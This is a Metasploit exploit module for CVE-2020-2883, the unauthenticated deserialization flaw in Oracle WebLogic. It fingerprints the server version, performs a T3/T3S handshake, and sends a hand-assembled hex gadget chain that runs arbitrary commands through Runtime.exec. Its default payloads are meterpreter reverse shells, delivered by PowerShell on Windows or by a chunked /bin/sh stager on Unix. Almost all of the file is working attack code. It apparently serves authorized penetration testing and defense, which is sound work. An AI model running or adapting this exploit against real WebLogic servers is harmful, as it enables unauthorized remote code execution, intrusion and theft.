##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
6
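class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  # Runs `check` ahead of `exploit` so that @version_no is populated; the
  # gadget serialVersionUIDs emitted below are selected from it.
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'WebLogic Server Deserialization RCE BadAttributeValueExpException ExtComp',
        'Description' => %q{
          There exists a Java object deserialization vulnerability
          in multiple versions of WebLogic.

          Unauthenticated remote code execution can be achieved by
          sending a serialized `BadAttributeValueExpException`
          object over the T3 protocol to vulnerable versions of
          WebLogic. Leveraging an `ExtractorComparator` enables
          the ability to trigger `method.invoke()`, which will
          execute arbitrary code.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Quynh Le', # Vulnerability Discovery
          'Y4er', # PoC
          'Shelby Pace', # Metasploit Module
          'Steve Embling' # T3S additions
        ],
        'References' => [
          [ 'CVE', '2020-2883' ],
          [ 'URL', 'https://www.thezdi.com/blog/2020/5/8/details-on-the-oracle-weblogic-vulnerability-being-exploited-in-the-wild' ],
        ],
        'Privileged' => false,
        'Targets' => [
          [
            'Windows',
            {
              'Platform' => 'win',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => { 'Payload' => 'windows/meterpreter/reverse_tcp' }
            }
          ],
          [
            'Unix',
            {
              'Platform' => %w[unix linux],
              'CmdStagerFlavor' => 'printf',
              'Arch' => [ ARCH_X86, ARCH_X64 ],
              'DefaultOptions' => { 'Payload' => 'linux/x86/meterpreter/reverse_tcp' }
            }
          ],
        ],
        'DisclosureDate' => '2020-04-30',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => [REPEATABLE_SESSION],
          'Stability' => [CRASH_SAFE],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(7001),
    ])

    register_advanced_options([
      # The handshake below speaks plain "t3" over an SSL socket when this is
      # set; otherwise an SSL connection is assumed to be a T3S listener.
      OptBool.new('FORCE_T3', [false, 'Force T3 protocol even over SSL', false])
    ])
  end

  # Version-based check. WebLogic serves HTTP on the T3 listen port, so the
  # console login page is requested over the same socket and the advertised
  # version is compared with the builds this module carries gadget
  # serialVersionUIDs for.
  #
  # Returns CheckCode::Appears when the banner matches one of those builds,
  # CheckCode::Detected when WebLogic answered with a version this module does
  # not handle, and CheckCode::Unknown when no usable response came back.
  # NOTE(review): the banner is the same before and after the April 2020 CPU
  # patch, so Appears means "version in scope", not "confirmed unpatched".
  def check
    connect

    # RFC 7230 line terminators; WebLogic tolerates bare LF but CRLF is what
    # any intermediary on the path expects.
    web_req = "GET /console/login/LoginForm.jsp HTTP/1.1\r\nHost: #{peer}\r\n\r\n"
    sock.put(web_req)
    sleep(2)
    res = sock.get

    return CheckCode::Unknown('Failed to obtain response from service') unless res

    # Named capture with a literal regex on the left assigns the local `version`.
    /WebLogic\s+Server[ -]+Version:\s+(?<version>\d+\.\d+\.\d+\.*\d*\.*\d*)/ =~ res
    return CheckCode::Unknown('Failed to detect WebLogic') unless version

    @version_no = Rex::Version.new(version)
    print_status("WebLogic version detected: #{@version_no}")

    # The only builds whose Coherence gadget serialVersionUIDs are known to
    # this module (see extractor_comp_uid & co.).
    supported = [
      Rex::Version.new('12.1.3.0.0'),
      Rex::Version.new('12.2.1.3.0'),
      Rex::Version.new('12.2.1.4.0')
    ]
    return CheckCode::Appears if supported.include?(@version_no)

    # Any other build is reported as unsupported rather than "not vulnerable":
    # the advisory's affected range is wider than the list above (the 10.3.6
    # branch, for instance), this module simply has no gadget UIDs for it.
    CheckCode::Detected('WebLogic version is not one this module supports')
  ensure
    disconnect
  end

  # Opens the T3(S) session and delivers the gadget chain. On Windows the whole
  # PowerShell payload is sent in a single object; on Unix the CmdStager drives
  # `execute_command` once per stager chunk.
  def exploit
    connect
    print_status('Sending handshake...')
    t3_handshake

    # The UID helpers fall through to their 12.2.1.4.0 values when no version
    # was detected (AutoCheck disabled or ForceExploit); say so explicitly
    # instead of silently guessing.
    if @version_no.nil?
      print_warning('No WebLogic version detected; defaulting to 12.2.1.4.0 gadget serialVersionUIDs')
    end

    if target.name == 'Windows'
      win_obj = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true })
      win_obj.prepend('cmd.exe /c ')
      win_obj = build_payload_obj(win_obj)
      t3_send(win_obj)
    else
      execute_cmdstager
    end
  ensure
    disconnect
  end

  # Sends the T3 greeting and consumes the server's reply. Decoded, the
  # greeting is:
  #   t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n
  # prefixed with "t3s" instead of "t3" when the socket is SSL and FORCE_T3
  # is off.
  def t3_handshake
    shake = if !datastore['SSL'] || datastore['FORCE_T3']
              '7433' # "t3"
            else
              '743373' # "t3s"
            end
    shake << '2031322e322e310a41533a323535' # " 12.2.1\nAS:255"
    shake << '0a484c3a31390a4d533a313030303030' # "\nHL:19\nMS:100000"
    shake << '30300a0a' # "00\n\n"

    sock.put([shake].pack('H*'))
    sleep(1)
    sock.get_once
  end

  # Builds the serialized PriorityQueue/ExtractorComparator gadget chain as a
  # hex string. `payload_data` is the full command line ("cmd.exe /c ..." or
  # "/bin/sh -c ..."); it ends up as the String[] handed to Runtime.exec via
  # Method.invoke. Class serialVersionUIDs and a few stream-handle numbers
  # differ between WebLogic builds, hence the version-dependent helpers.
  def build_payload_obj(payload_data)
    payload_obj = 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    payload_obj << '73720017' # TC_OBJECT, TC_CLASSDESC, class name length: 23
    payload_obj << '6a6176612e7574696c2e5072696f726974795175657565' # java.util.PriorityQueue
    payload_obj << '94da30b4fb3f82b1' # SerialVersionUID
    payload_obj << '030002' # SC_WRITE_METHOD | SC_SERIALIZABLE, 2 fields
    payload_obj << '490004' # Integer, field name length: 4
    payload_obj << '73697a65' # size
    payload_obj << '4c000a' # Object, field name length: 10
    payload_obj << '636f6d70617261746f72' # comparator
    payload_obj << '740016' # String, field name length: 22
    payload_obj << '4c6a6176612f7574696c2f436f6d70617261746f723b' # Ljava/util/Comparator;
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL (no superclass)
    payload_obj << '00000002' # size = 2
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC (comparator field)
    payload_obj << '0030' # Class name length: 48
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e636f' # com.tangosol.util.comparator.ExtractorComparator
    payload_obj << '6d70617261746f722e457874726163746f72436f'
    payload_obj << '6d70617261746f72'
    payload_obj << extractor_comp_uid # SerialVersionUID (version specific)
    payload_obj << '020001' # Serializable, 1 field
    payload_obj << '4c000b' # Object, field name length: 11
    payload_obj << '6d5f657874726163746f72' # m_extractor
    payload_obj << '740022' # String, length: 34
    payload_obj << '4c636f6d2f74616e676f736f6c2f7574696c2f56' # Lcom/tangosol/util/ValueExtractor;
    payload_obj << '616c7565457874726163746f723b'
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC (m_extractor)
    payload_obj << '002c' # Class name length: 44
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ChainedExtractor
    payload_obj << '74726163746f722e436861696e65644578747261'
    payload_obj << '63746f72'
    payload_obj << chained_extractor_uid # SerialVersionUID (version specific)
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    payload_obj << '0036' # Class name length: 54
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractCompositeExtractor
    payload_obj << '74726163746f722e4162737472616374436f6d70'
    payload_obj << '6f73697465457874726163746f72'
    payload_obj << '086b3d8c05690f44' # SerialVersionUID
    payload_obj << '020001' # Serializable, 1 field
    payload_obj << '5b000c' # array, field name length: 12
    payload_obj << '6d5f61457874726163746f72' # m_aExtractor
    payload_obj << '740023' # String, length: 35
    payload_obj << '5b4c636f6d2f74616e676f736f6c2f7574696c2f' # [Lcom/tangosol/util/ValueExtractor;
    payload_obj << '56616c7565457874726163746f723b'
    payload_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC (superclass)
    payload_obj << '002d' # Class name length: 45
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.AbstractExtractor
    payload_obj << '74726163746f722e416273747261637445787472'
    payload_obj << '6163746f72'
    payload_obj << abstract_extractor_uid # SerialVersionUID (version specific)
    payload_obj << '020001' # Serializable, 1 field
    payload_obj << '490009' # Integer, field name length: 9
    payload_obj << '6d5f6e546172676574' # m_nTarget
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000' # m_nTarget = 0
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC (m_aExtractor)
    payload_obj << '0023' # Class name length: 35
    payload_obj << '5b4c636f6d2e74616e676f736f6c2e7574696c2e' # [Lcom.tangosol.util.ValueExtractor;
    payload_obj << '56616c7565457874726163746f723b'
    payload_obj << '2246204735c4a0fe' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000003' # array length: 3 (getRuntime, getMethod/invoke, exec)
    payload_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    payload_obj << '002f' # Class name length: 47
    payload_obj << '636f6d2e74616e676f736f6c2e7574696c2e6578' # com.tangosol.util.extractor.ReflectionExtractor
    payload_obj << '74726163746f722e5265666c656374696f6e4578'
    payload_obj << '74726163746f72'
    payload_obj << reflection_extractor_uid # SerialVersionUID (version specific)
    payload_obj << '02000' # Serializable; field count nibble follows
    payload_obj << reflect_extract_count # '2' or '3' fields depending on build
    payload_obj << '5b0009' # array, field name length: 9
    payload_obj << '6d5f616f506172616d' # m_aoParam
    payload_obj << '740013' # String, length: 19
    payload_obj << '5b4c6a6176612f6c616e672f4f626a6563743b' # [Ljava/lang/Object;
    payload_obj << add_sect # extra m_extractorCached field on 12.2.1.3.0 only
    payload_obj << '4c0009' # Object, field name length: 9
    payload_obj << '6d5f734d6574686f64' # m_sMethod
    payload_obj << '740012' # String, length: 18
    payload_obj << '4c6a6176612f6c616e672f537472696e673b' # Ljava/lang/String;
    payload_obj << '7871' # TC_ENDBLOCKDATA, TC_REFERENCE
    payload_obj << '007e0009' # handle (AbstractExtractor class desc)
    payload_obj << '00000000' # m_nTarget = 0
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC (m_aoParam)
    payload_obj << '0013' # Class name length: 19
    payload_obj << '5b4c6a6176612e6c616e672e4f626a6563743b' # [Ljava.lang.Object;
    payload_obj << '90ce589f1073296c' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000002' # array length: 2
    payload_obj << '74000a' # String, length: 10
    payload_obj << '67657452756e74696d65' # getRuntime
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0012' # Class name length: 18
    payload_obj << '5b4c6a6176612e6c616e672e436c6173733b' # [Ljava.lang.Class;
    payload_obj << 'ab16d7aecbcd5a99' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000000' # empty Class[] (getRuntime takes no parameters)
    payload_obj << add_tc_null # TC_NULL for m_extractorCached on 12.2.1.3.0
    payload_obj << '740009' # String, length: 9
    payload_obj << '6765744d6574686f64' # getMethod
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
    payload_obj << '007e000d' # handle (ReflectionExtractor class desc)
    payload_obj << '00000000' # m_nTarget = 0
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle ([Ljava.lang.Object;)
    payload_obj << '00000002' # array length: 2
    payload_obj << '707571' # TC_NULL, TC_ARRAY, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle ([Ljava.lang.Object;)
    payload_obj << '00000000' # empty Object[]
    payload_obj << add_tc_null # TC_NULL for m_extractorCached on 12.2.1.3.0
    payload_obj << '740006' # String, length: 6
    payload_obj << '696e766f6b65' # invoke
    payload_obj << '7371' # TC_OBJECT, TC_REFERENCE
    payload_obj << '007e000d' # handle (ReflectionExtractor class desc)
    payload_obj << '00000000' # m_nTarget = 0
    payload_obj << '7571' # TC_ARRAY, TC_REFERENCE
    payload_obj << (change_handle? ? '007e0012' : '007e0011') # handle ([Ljava.lang.Object;)
    payload_obj << '00000001' # array length: 1
    payload_obj << '7572' # TC_ARRAY, TC_CLASSDESC
    payload_obj << '0013' # Class name length: 19
    payload_obj << '5b4c6a6176612e6c616e672e537472696e673b' # [Ljava.lang.String;
    payload_obj << 'add256e7e91d7b47' # SerialVersionUID
    payload_obj << '020000' # Serializable, no fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '00000003' # String[3]: interpreter, flag, command

    # The three TC_STRING elements of the String[] passed to Runtime.exec.
    payload_obj << format_payload(payload_data)

    payload_obj << add_tc_null # TC_NULL for m_extractorCached on 12.2.1.3.0
    payload_obj << '740004' # String, length: 4
    payload_obj << '65786563' # exec
    payload_obj << '7704' # TC_BLOCKDATA, 4 bytes (PriorityQueue.writeObject)
    payload_obj << '00000003' # max size
    payload_obj << '76720011' # TC_CLASS, TC_CLASSDESC, class name length: 17
    payload_obj << '6a6176612e6c616e672e52756e74696d65' # java.lang.Runtime
    payload_obj << '0000000000000000000000' # SerialVersionUID 0, flags 0, 0 fields
    payload_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    payload_obj << '740001' # String, length: 1
    payload_obj << '3178' # "1", TC_ENDBLOCKDATA
  end

  # com.tangosol.util.comparator.ExtractorComparator serialVersionUID for the
  # detected build; 12.2.1.4.0 is the fallback when no version is known.
  def extractor_comp_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      'c7ad6d3a676f3c18'
    when Rex::Version.new('12.2.1.3.0')
      'fb4ac83df1d72edc'
    else
      'f9b3bc58cc52cd21'
    end
  end

  # 12.2.1.3.0 serialises one extra field on ReflectionExtractor, which shifts
  # the stream handle numbers assigned after it by one.
  def change_handle?
    @version_no == Rex::Version.new('12.2.1.3.0')
  end

  # com.tangosol.util.extractor.ChainedExtractor serialVersionUID for the
  # detected build; 12.2.1.4.0 is the fallback.
  def chained_extractor_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      '889f81b0945d5b7f'
    when Rex::Version.new('12.2.1.3.0')
      '06ee10433a4cc4b4'
    else
      '435b250b72f63db5'
    end
  end

  # com.tangosol.util.extractor.AbstractExtractor serialVersionUID for the
  # detected build; 12.2.1.4.0 is the fallback.
  def abstract_extractor_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      '658195303e723821'
    when Rex::Version.new('12.2.1.3.0')
      '752289ad4d460138'
    else
      '9b1be18ed70100e5'
    end
  end

  # com.tangosol.util.extractor.ReflectionExtractor serialVersionUID for the
  # detected build; 12.2.1.4.0 is the fallback.
  def reflection_extractor_uid
    case @version_no
    when Rex::Version.new('12.1.3.0.0')
      'ee7ae995c02fb4a2'
    when Rex::Version.new('12.2.1.3.0')
      '87973791b26429dd'
    else
      '1f62f564b951b614'
    end
  end

  # Low nibble of ReflectionExtractor's serialized field count: 3 on
  # 12.2.1.3.0 (m_aoParam, m_extractorCached, m_sMethod), 2 elsewhere.
  def reflect_extract_count
    @version_no == Rex::Version.new('12.2.1.3.0') ? '3' : '2'
  end

  # Field descriptor for ReflectionExtractor.m_extractorCached, present only
  # in the 12.2.1.3.0 class layout; empty for every other build.
  def add_sect
    return '' unless @version_no == Rex::Version.new('12.2.1.3.0')

    sect = '4c0011' # Object, field name length: 17
    sect << '6d5f657874726163746f' # m_extractorCached
    sect << '72436163686564'
    sect << '740012' # String, length: 18
    sect << '4c6a6176612f6c616e67' # Ljava/lang/Object;
    sect << '2f4f626a6563743b'
    sect
  end

  # TC_NULL value for m_extractorCached on 12.2.1.3.0, empty otherwise.
  def add_tc_null
    return '70' if @version_no == Rex::Version.new('12.2.1.3.0')

    ''
  end

  # Wraps the gadget chain in a T3 CMD_IDENTIFY_REQUEST packet (class table
  # entries, peer/version info and JVMID records copied from a real client
  # session) and writes it to the socket. The leading length field is patched
  # to the actual packet size before sending.
  #
  # NOTE(review): the JVMID records carry the PoC author's fixed address
  # (127.0.1.1) and hostname (us-l-breens); both are constant across runs and
  # make easy network/log signatures for this module.
  def t3_send(payload_obj)
    print_status('Sending object...')

    request_obj = '000009f3' # packet length placeholder, patched below
    request_obj << '016501' # CMD_IDENTIFY_REQUEST, flags
    request_obj << 'ffffffffffffffff'
    request_obj << '00000071'
    request_obj << '0000ea60'
    request_obj << '00000018432ec6'
    request_obj << 'a2a63985b5af7d63e643'
    request_obj << '83f42a6d92c9e9af0f94'
    request_obj << '72027973720078720178'
    request_obj << '720278700000000c0000'
    request_obj << '00020000000000000000'
    request_obj << '00000001007070707070'
    request_obj << '700000000c0000000200'
    request_obj << '00000000000000000000'
    request_obj << '01007006'
    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '001d' # Class name length: 29
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
    request_obj << '6a766d2e436c61737354'
    request_obj << '61626c65456e747279'
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
    request_obj << '0c0000' # SC_EXTERNALIZABLE | SC_BLOCK_DATA, 0 fields
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5061636b61'
    request_obj << '6765496e666f'
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
    request_obj << '020009' # Serializable, 9 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
    request_obj << '4c0009' # Field type: Object, field name length: 9
    request_obj << '696d706c5469746c65' # implTitle
    request_obj << '740012' # String, length: 18
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    request_obj << '2f537472696e673b'
    request_obj << '4c000a' # Field type: Object, field name length: 10
    request_obj << '696d706c56656e646f72' # implVendor
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '4c000b' # Field type: Object, field name length: 11
    request_obj << '696d706c56657273696f6e' # implVersion
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    request_obj << '7702' # TC_BLOCKDATA, 2 bytes
    request_obj << '000078' # block data, TC_ENDBLOCKDATA
    request_obj << 'fe010000' # separator

    request_obj << payload_obj

    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '001d' # Class name length: 29
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.ClassTableEntry
    request_obj << '6a766d2e436c61737354'
    request_obj << '61626c65456e747279'
    request_obj << '2f52658157f4f9ed' # SerialVersionUID
    request_obj << '0c0000'
    request_obj << '787072' # TC_ENDBLOCKDATA, TC_NULL, TC_CLASSDESC
    request_obj << '0021' # Class name length: 33
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PeerInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5065657249'
    request_obj << '6e666f'
    request_obj << '585474f39bc908f1' # SerialVersionUID
    request_obj << '020007' # Serializable, 7 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
    request_obj << '5b0008' # Field type: Array, field name length: 8
    request_obj << '7061636b61676573' # packages
    request_obj << '740027' # String, length: 39
    request_obj << '5b4c7765626c6f676963' # [Lweblogic/common/internal/PackageInfo;
    request_obj << '2f636f6d6d6f6e2f696e'
    request_obj << '7465726e616c2f506163'
    request_obj << '6b616765496e666f3b'
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.VersionInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5665727369'
    request_obj << '6f6e496e666f'
    request_obj << '972245516452463e' # SerialVersionUID
    request_obj << '020003' # Serializable, 3 fields
    request_obj << '5b0008' # Field type: Array, field name length: 8
    request_obj << '7061636b61676573' # packages
    request_obj << '71007e0003' # TC_REFERENCE, handle
    request_obj << '4c000e' # Field type: Object, field name length: 14
    request_obj << '72656c65617365566572' # releaseVersion
    request_obj << '73696f6e'
    request_obj << '740012' # String, length: 18
    request_obj << '4c6a6176612f6c616e67' # Ljava/lang/String;
    request_obj << '2f537472696e673b'
    request_obj << '5b0012' # Field type: Array, field name length: 18
    request_obj << '76657273696f6e496e66' # versionInfoAsBytes
    request_obj << '6f41734279746573'
    request_obj << '740002' # String, length: 2
    request_obj << '5b42' # [B
    request_obj << '7872' # TC_ENDBLOCKDATA, TC_CLASSDESC
    request_obj << '0024' # Class name length: 36
    request_obj << '7765626c6f6769632e63' # weblogic.common.internal.PackageInfo
    request_obj << '6f6d6d6f6e2e696e7465'
    request_obj << '726e616c2e5061636b61'
    request_obj << '6765496e666f'
    request_obj << 'e6f723e7b8ae1ec9' # SerialVersionUID
    request_obj << '020009' # Serializable, 9 fields
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d616a6f72' # major
    request_obj << '490005' # Field type: Int, field name length: 5
    request_obj << '6d696e6f72' # minor
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '70617463685570646174' # patchUpdate
    request_obj << '65'
    request_obj << '49000c' # Field type: Int, field name length: 12
    request_obj << '726f6c6c696e67506174' # rollingPatch
    request_obj << '6368'
    request_obj << '49000b' # Field type: Int, field name length: 11
    request_obj << '73657276696365506163' # servicePack
    request_obj << '6b'
    request_obj << '5a000e' # Field type: Z = Bool, field name length: 14
    request_obj << '74656d706f7261727950' # temporaryPatch
    request_obj << '61746368'
    request_obj << '4c0009' # Field type: Object, field name length: 9
    request_obj << '696d706c5469746c65' # implTitle
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '4c000a' # Field type: Object, field name length: 10
    request_obj << '696d706c56656e646f72' # implVendor
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '4c000b' # Field type: Object, field name length: 11
    request_obj << '696d706c56657273696f' # implVersion
    request_obj << '6e'
    request_obj << '71007e0005' # TC_REFERENCE, handle
    request_obj << '7870' # TC_ENDBLOCKDATA, TC_NULL
    request_obj << '7702000078' # TC_BLOCKDATA, 2 bytes, TC_ENDBLOCKDATA
    request_obj << 'fe00ff' # separator
    request_obj << 'fe010000'
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '0013' # Class name length: 19
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
    request_obj << '6a766d2e4a564d4944'
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
    request_obj << '0c0000'
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
    request_obj << '4621'
    request_obj << '000000000000000000'
    request_obj << '09' # length: 9
    request_obj << '3132372e302e312e31' # 127.0.1.1 (fixed, fingerprintable)
    request_obj << '000b' # length: 11
    request_obj << '75732d6c2d627265656e' # us-l-breens (fixed, fingerprintable)
    request_obj << '73'
    request_obj << 'a53caff10000000700'
    request_obj << '001b59'
    request_obj << 'ffffffffffffffffffff'
    request_obj << 'ffffffffffffffffffff'
    request_obj << 'ffffffff'
    request_obj << '0078'
    request_obj << 'fe010000' # separator
    request_obj << 'aced0005' # STREAM_MAGIC, STREAM_VERSION
    request_obj << '7372' # TC_OBJECT, TC_CLASSDESC
    request_obj << '0013' # Class name length: 19
    request_obj << '7765626c6f6769632e72' # weblogic.rjvm.JVMID
    request_obj << '6a766d2e4a564d4944'
    request_obj << 'dc49c23ede121e2a' # SerialVersionUID
    request_obj << '0c0000'
    request_obj << '787077' # TC_ENDBLOCKDATA, TC_NULL, TC_BLOCKDATA
    request_obj << '1d0181401281'
    request_obj << '34bf427600093132372e'
    request_obj << '302e312e31a53caff1'
    request_obj << '000000000078'

    # Two hex digits per byte; patch the real byte count into the header.
    request_obj[0, 8] = format('%08x', request_obj.length / 2)

    sock.put([request_obj].pack('H*'))
    sleep(1)
  end

  # Serialises the command line as the String[] handed to Runtime.exec: it is
  # split into at most three whitespace-separated parts (interpreter, flag,
  # command) and each part becomes a TC_STRING in the stream.
  #
  # TC_STRING carries a 16-bit byte length, so a part longer than 65535 bytes
  # cannot be encoded; rather than emit a length field that silently overruns
  # into the string bytes, that case aborts with BadConfig. Lengths are byte
  # lengths (`bytesize`), which is what the reader counts.
  def format_payload(payload_cmd)
    print_status('Formatting payload...')

    payload_cmd.split(' ', 3).each_with_object(''.dup) do |part, out|
      len = part.bytesize
      if len > 0xffff
        fail_with(Failure::BadConfig, "Payload segment is #{len} bytes; TC_STRING allows at most 65535")
      end

      out << '74' # TC_STRING
      out << format('%04x', len)
      out << part.unpack1('H*')
    end
  end

  # CmdStager callback: wraps one stager chunk in `/bin/sh -c` and delivers it
  # through the gadget chain. A new string is built so the caller's `cmd` is
  # not mutated.
  def execute_command(cmd, _opts = {})
    t3_send(build_payload_obj("/bin/sh -c #{cmd}"))
  end
end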